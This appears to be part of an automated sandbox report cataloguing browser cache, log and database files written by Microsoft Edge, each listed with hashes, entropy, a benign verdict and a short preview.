                                                                                                                                                                                                                                                                                                  SHA-512:B9A8DFE905C1AF0DDC67D56A5E6BBD3A7662D3C16F10673F628AA6F6557023EAF6A8F5C857D9883F80115F5A6DD75A6179E2318CC86B1282B4505FBFB8CFBC32
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):189105
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.386816528737029
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XBNzI1d4Q+wejl+JD34pL/fKdQTTCcvMJhkiHD1n/UgfL/:++we8JDiL/3/UJScJ/
                                                                                                                                                                                                                                                                                                  MD5:A1288B5E446206DE7BFB9FDE393E071E
                                                                                                                                                                                                                                                                                                  SHA1:F80E913C77ADC12F1A5226C56068BA63F00DA15F
                                                                                                                                                                                                                                                                                                  SHA-256:D17A8AEB6C98F955555E63CFD7643894356AF5F741806EA9E9E3569A5AA6EFFE
                                                                                                                                                                                                                                                                                                  SHA-512:74FCE8A1496BC486231899E206A357CDC52E4743F9F7678FF8A36D0B4598005EA0E649E11D01BF7C6EAC5B09B2DAC191BB1F50B684263050F65631E2067F6407
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.8..`,.....L`.....,T...`......L`......RcZ.......exports...Rc.......module....Rc.I......define....Rb.j......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...v..!{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.509856868205173
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:XVlXAyXl/lYV/lxEstllQvzn:TXjYWs+b
                                                                                                                                                                                                                                                                                                  MD5:76685352F16850A11CFAB41FEAE5FC8A
                                                                                                                                                                                                                                                                                                  SHA1:72A52F410DB4229C88674FE3EE838F2E8A9EF267
                                                                                                                                                                                                                                                                                                  SHA-256:B19616DD053C9870F33E133E1E3B63FA5AEF491E23677C28885F3A001B78D711
                                                                                                                                                                                                                                                                                                  SHA-512:DFE6EC6F15F05C19CF0110A9FC055B33ADA7947047A36CDB6E6EA19539EAE44E501816C39721C30B42361E4399B3A38A384CDB5AC4C24C5307E55DEA47F82849
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@..."...oy retne.........................X....,................x..z./.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.509856868205173
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:XVlXAyXl/lYV/lxEstllQvzn:TXjYWs+b
                                                                                                                                                                                                                                                                                                  MD5:76685352F16850A11CFAB41FEAE5FC8A
                                                                                                                                                                                                                                                                                                  SHA1:72A52F410DB4229C88674FE3EE838F2E8A9EF267
                                                                                                                                                                                                                                                                                                  SHA-256:B19616DD053C9870F33E133E1E3B63FA5AEF491E23677C28885F3A001B78D711
                                                                                                                                                                                                                                                                                                  SHA-512:DFE6EC6F15F05C19CF0110A9FC055B33ADA7947047A36CDB6E6EA19539EAE44E501816C39721C30B42361E4399B3A38A384CDB5AC4C24C5307E55DEA47F82849
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@..."...oy retne.........................X....,................x..z./.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4ef1f.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.509856868205173
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:XVlXAyXl/lYV/lxEstllQvzn:TXjYWs+b
                                                                                                                                                                                                                                                                                                  MD5:76685352F16850A11CFAB41FEAE5FC8A
                                                                                                                                                                                                                                                                                                  SHA1:72A52F410DB4229C88674FE3EE838F2E8A9EF267
                                                                                                                                                                                                                                                                                                  SHA-256:B19616DD053C9870F33E133E1E3B63FA5AEF491E23677C28885F3A001B78D711
                                                                                                                                                                                                                                                                                                  SHA-512:DFE6EC6F15F05C19CF0110A9FC055B33ADA7947047A36CDB6E6EA19539EAE44E501816C39721C30B42361E4399B3A38A384CDB5AC4C24C5307E55DEA47F82849
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@..."...oy retne.........................X....,................x..z./.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):6213
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.382687648143752
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:N91sW3ZJG9Xp+vt+ViYokAsLl9iSr/1rhc8NhS+6h:Nsh9Xp+FKiYDZLl9iSr/phDu
                                                                                                                                                                                                                                                                                                  MD5:F87EC05AC71B1793F4B84F8870BFD10F
                                                                                                                                                                                                                                                                                                  SHA1:65768E7F923C99DAB55BFF2ACEB3414114F66FC6
                                                                                                                                                                                                                                                                                                  SHA-256:EF8CD663441C351ACF0D3DCCA515A9A7CC18DCEFDDC3A29875495E11CDDE43B3
                                                                                                                                                                                                                                                                                                  SHA-512:4BF96265339399A1C64645CFDB86D50549681ED721276EFF577AF9B376728604D3E00FFD2674A8956C8FF6C1FB460E2E339329D369177A0BC039A7ABAED60C58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-c05d450e_a561_4690_abd2_322580b9715b-https://ntp.msn.com/.0..c..................map-0-shd_sweeper.-{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.m.s.n.-.b.l.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.9.0.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.c.o.o.k.i.e.s.y.n.c.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.-.l.i.f.e.c.y.c.l.e.,.1.s.-.w.p.o.-.p.r.2.-.n.c.a.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.12027744461977
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XkJN+q2P923oH+TcwtrQMxIFUt8U4XmZmw+U4X2HNVkwO923oH+TcwtrQMFLJ:Bnav4YebCFUt8Uj/+UFz5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:48E0EB1DD7E06D7413E1050854FDA08E
                                                                                                                                                                                                                                                                                                  SHA1:2C3BC6CB18AB6795887D15EFB694FF833B4388B6
                                                                                                                                                                                                                                                                                                  SHA-256:2B233860239487FF086FC4D647F3C691526196513BB6CC626D61F8D9CBB108D6
                                                                                                                                                                                                                                                                                                  SHA-512:D456C48CC9BB1788018683F4E8C72F384EDA2DFCAB455E4B799899434D99A39979F3137B8A3F06324B63992C71A0837A6382E6B3628B5CFB3ED81B41129B4C98
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.563 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:01:22.574 1158 Recovering log #3.2024/12/27-01:01:22.578 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.12027744461977
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XkJN+q2P923oH+TcwtrQMxIFUt8U4XmZmw+U4X2HNVkwO923oH+TcwtrQMFLJ:Bnav4YebCFUt8Uj/+UFz5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:48E0EB1DD7E06D7413E1050854FDA08E
                                                                                                                                                                                                                                                                                                  SHA1:2C3BC6CB18AB6795887D15EFB694FF833B4388B6
                                                                                                                                                                                                                                                                                                  SHA-256:2B233860239487FF086FC4D647F3C691526196513BB6CC626D61F8D9CBB108D6
                                                                                                                                                                                                                                                                                                  SHA-512:D456C48CC9BB1788018683F4E8C72F384EDA2DFCAB455E4B799899434D99A39979F3137B8A3F06324B63992C71A0837A6382E6B3628B5CFB3ED81B41129B4C98
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.563 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:01:22.574 1158 Recovering log #3.2024/12/27-01:01:22.578 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379752884056016

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8307916091249417
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:3MH+RAIyeDgpsAF4unxCtLp3X2amEtG1ChqsRwaAHEQQKkOAM44Yb:31WIfgzFkLp2FEkChsjkhHOpp
                                                                                                                                                                                                                                                                                                  MD5:29841BE2830647BD64A6C50212CA4021
                                                                                                                                                                                                                                                                                                  SHA1:E2132F82DA9B9B6DD2BC247DA14935EDF391401A
                                                                                                                                                                                                                                                                                                  SHA-256:F2422DACF6830AA6A71729ED6E75A59FA00D7D59BEE27E29F9E56477A581769C
                                                                                                                                                                                                                                                                                                  SHA-512:67516E089C92C5E825EF2636AB281C816C14F174CDF12E1B91983685568A03508496DF7696A5F14AC18F5F4594B4CB2C27514F6E7225DCA9233E21F85AA67800
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SNSS..........f..............f......"...f..............f..........f..........f..........f....!.....f..................................f...f1..,......f$...c05d450e_a561_4690_abd2_322580b9715b......f..........f....;8............f......f..........................f....................5..0......f&...{98952893-68FF-4A5D-A164-705C709ED3DB}........f..........f.............................f..............f........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........^1:*....^1:*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):349
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.09162777913444
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xuq2P923oH+Tcwt7Uh2ghZIFUt8U4XHw9Zmw+U4XHwPkwO923oH+Tcwt7Uh2gd:BRv4YebIhHh2FUt8U6g/+U6I5LYebIh9
                                                                                                                                                                                                                                                                                                  MD5:A42CC2FB0BF137AB76F5B723352EE966
                                                                                                                                                                                                                                                                                                  SHA1:FA30B36BDF3DE013EF0630E9A0FBAAECDB830F26
                                                                                                                                                                                                                                                                                                  SHA-256:43130836A3D0EA579787BF9CFFCAB36F2A34449C14FB547BB6A1624ECA86C8DC
                                                                                                                                                                                                                                                                                                  SHA-512:18CC27BDFD93C208DB899B1901ACF5ECF947F50E811117994B43AE6D750CB6E69EB75DA753DEC8B3F6557E8A7F2FA2C0E9443225CBBB01E057F719CA198F1095
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.493 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:01:21.577 e04 Recovering log #3.2024/12/27-01:01:21.577 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):349
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.09162777913444
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xuq2P923oH+Tcwt7Uh2ghZIFUt8U4XHw9Zmw+U4XHwPkwO923oH+Tcwt7Uh2gd:BRv4YebIhHh2FUt8U6g/+U6I5LYebIh9
                                                                                                                                                                                                                                                                                                  MD5:A42CC2FB0BF137AB76F5B723352EE966
                                                                                                                                                                                                                                                                                                  SHA1:FA30B36BDF3DE013EF0630E9A0FBAAECDB830F26
                                                                                                                                                                                                                                                                                                  SHA-256:43130836A3D0EA579787BF9CFFCAB36F2A34449C14FB547BB6A1624ECA86C8DC
                                                                                                                                                                                                                                                                                                  SHA-512:18CC27BDFD93C208DB899B1901ACF5ECF947F50E811117994B43AE6D750CB6E69EB75DA753DEC8B3F6557E8A7F2FA2C0E9443225CBBB01E057F719CA198F1095
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.493 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:01:21.577 e04 Recovering log #3.2024/12/27-01:01:21.577 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213130221366608
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X+VNAVq2P923oH+TcwtzjqEKj3K/2jMGIFUt8U4XRAgZmw+U4XfvAIkwO923od:BGv4YebvqBQFUt8Um/+UA75LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:52E81E338B151E6A071B640BCCF37CC9
                                                                                                                                                                                                                                                                                                  SHA1:7951BA04A65AD80388621583006670C7D853A06D
                                                                                                                                                                                                                                                                                                  SHA-256:336FBFFE96EEC521B27D7A4D2590A3A0B8ED8886F98E45F21B92C02AC99C6C56
                                                                                                                                                                                                                                                                                                  SHA-512:1F3E52BC47C352A18B7520A932AB7672CFC765BC253C1F4CBEDB3223970984522F6FB956CEA4F3A79ED4D44760603C2013AA243FF7B81E476F12CE3E8CC60472
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.576 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.579 14d0 Recovering log #3.2024/12/27-01:01:22.582 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213130221366608
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X+VNAVq2P923oH+TcwtzjqEKj3K/2jMGIFUt8U4XRAgZmw+U4XfvAIkwO923od:BGv4YebvqBQFUt8Um/+UA75LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:52E81E338B151E6A071B640BCCF37CC9
                                                                                                                                                                                                                                                                                                  SHA1:7951BA04A65AD80388621583006670C7D853A06D
                                                                                                                                                                                                                                                                                                  SHA-256:336FBFFE96EEC521B27D7A4D2590A3A0B8ED8886F98E45F21B92C02AC99C6C56
